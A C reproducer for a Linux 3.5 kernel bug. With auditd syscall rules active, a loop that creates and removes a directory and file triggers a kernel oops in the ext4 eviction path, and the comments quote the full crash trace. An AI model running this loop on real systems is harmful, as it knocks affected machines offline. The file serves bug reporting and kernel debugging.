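/*
 * steps:
 * 1) compile with gcc -m32
 * 2) start auditd, install any rule (I've only tested syscall auditing, but any syscall seems to work).
 *    /etc/init.d/auditd start ; auditctl -D ; auditctl -a exit,always -F arch=b64 -S chmod
 * 3) run'n wait (this only loops twice for me before dying)
 *    ./a.out
 * 4) instantaneous kernel oops.
 *
 * (The symbol addresses that originally stood inside the [] brackets below
 *  were lost when this file was extracted; the symbol+offset text survives.)
 *
 * kernel BUG at /build/buildd/linux-3.5.0/fs/buffer.c:1218!
 * invalid opcode: 0000 [#3] SMP
 * CPU 3
 * Modules linked in:[ 499.132393] lp microcode parport
 *
 * Pid: 6249, comm: a.out Tainted: G D 3.5.0-22-generic #34-Ubuntu
 * RIP: e030:[] [] check_irqs_on.part.9+0x4/0x6
 * RSP: e02b:ffff8800f36e1c08 EFLAGS: 00010046
 * RAX: ffff880003570000 RBX: 0000000000001000 RCX: ffff880003573000
 * RDX: 0000000000001000 RSI: 000000000020021d RDI: ffff8800045dc340
 * RBP: ffff8800f36e1c08 R08: 0000000000000000 R09: 0000000000000000
 * R10: ffff880003573000 R11: ffff8800f39de860 R12: ffff8800f36e1dd0
 * R13: 0000000000001fd6 R14: ffff880003573400 R15: ffff8800045dc340
 * FS: 00007f12fe20e700(0000) GS:ffff8800ff980000(0063) knlGS:0000000000000000
 * CS: e033 DS: 002b ES: 002b CR0: 000000008005003b
 * CR2: 00000000f7652ad0 CR3: 000000000330f000 CR4: 0000000000000660
 * DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
 * DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
 * Process a.out (pid: 6249, threadinfo ffff8800f36e0000, task ffff8800f2cb5c00)
 * Stack:
 *  ffff8800f36e1c78 ffffffff811b35d9 ffff8800f36e1c28 ffffffff8107e6c1
 *  ffff8800f36e1c78 ffffffff8118d5c6 ffff8800f36e1d20 ffff8800f2cb5c00
 *  ffff8800f36e1e78 ffff8800e0117c30 0000000000001000 ffff8800f36e1dd0
 * Call Trace:
 *  [] __find_get_block+0x1f9/0x200
 *  [] ? in_group_p+0x31/0x40
 *  [] ? generic_permission+0x176/0x260
 *  [] __getblk+0x24/0x2e0
 *  [] ? ext4_xattr_get+0xe4/0x2e0
 *  [] __ext4_get_inode_loc+0xed/0x410
 *  [] ext4_get_inode_loc+0x1d/0x20
 *  [] ext4_reserve_inode_write+0x2d/0xa0
 *  [] ? ext4_evict_inode+0x1bf/0x490
 *  [] ext4_mark_inode_dirty+0x4f/0x1f0
 *  [] ext4_evict_inode+0x1bf/0x490
 *  [] evict+0xb6/0x1b0
 *  [] iput+0x109/0x190
 *  [] d_kill+0x108/0x150
 *  [] dput+0xe2/0x1d0
 *  [] path_put+0x1a/0x30
 *  [] __audit_syscall_exit+0x34b/0x480
 *  [] sysretl_audit+0x29/0x5b
 * Code: 80 0e a2 81 e8 9c cc ff ff 4d 85 e4 74 14 49 8d 7c 24 5c e8 91 82 99 ff 66 90 4c 89
 *       e7 e8 f7 e8 b1 ff 5b 41 5c 5d c3 55 48 89 e5 <0f> 0b 55 48 89 e5 0f 0b 55 48 89 e5 0f 0b
 *       55 48 89 e5 0f 0b 55
 * RIP [] check_irqs_on.part.9+0x4/0x6
 * RSP
 */

/*
 * The header names were lost in extraction (the file had four bare
 * "#include" lines); they are restored here from the functions the
 * program calls: fprintf/fopen/fclose/snprintf -> <stdio.h>,
 * mkdir -> <sys/stat.h>, chdir/unlink/rmdir -> <unistd.h>.
 */
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Working directory for the repro.  mkdir() is not recursive, so the
 * parent (/usr/local/tmp/crasher) must already exist or every iteration
 * fails at mkdir() and fopen() below.
 */
#define KILLDIR "/usr/local/tmp/crasher/kill_dir"

/*
 * Reproducer loop: create KILLDIR, enter it, create and write a file in
 * it, then unlink the file and remove the directory, forever.  Each
 * iteration prints its index to stderr as a progress marker.
 *
 * Changes from the original listing:
 *  - fopen() is checked; the original passed a NULL FILE* to fprintf()
 *    when the file could not be created (e.g. missing parent directory),
 *    which crashes the reproducer itself rather than exercising the kernel.
 *  - the path is built once with snprintf() instead of sprintf() in the loop.
 *  - the counter is unsigned so it cannot overflow (signed overflow is UB).
 *
 * Returns 0 only if the loop is left, which it is not; returns 1 if the
 * path does not fit the buffer or the file cannot be created.
 */
int main(void)
{
    char fullpath[512];
    unsigned long iter = 0;

    /* KILLDIR is a constant so this cannot truncate today; the check keeps
     * the write bounded if the macro is ever changed. */
    int len = snprintf(fullpath, sizeof fullpath, "%s/file", KILLDIR);
    if (len < 0 || (size_t)len >= sizeof fullpath) {
        fprintf(stderr, "path too long: %s/file\n", KILLDIR);
        return 1;
    }

    while (1) {
        fprintf(stderr, "%lu ", iter++);

        /* Results deliberately ignored: fullpath is absolute, so a failed
         * chdir() does not change where the file is created, and a failed
         * mkdir() is caught by the fopen() check below.  The calls are kept
         * so the sequence of path-taking syscalls matches the original.
         * 0777 (masked by umask) is wider than this program needs. */
        (void)mkdir(KILLDIR, 0777);
        (void)chdir(KILLDIR);

        FILE *f = fopen(fullpath, "w+");
        if (f == NULL) {
            perror("fopen");
            return 1;
        }
        fprintf(f, "nothing to see here");
        fclose(f);

        (void)unlink(fullpath);
        (void)rmdir(KILLDIR);
    }

    return 0;
}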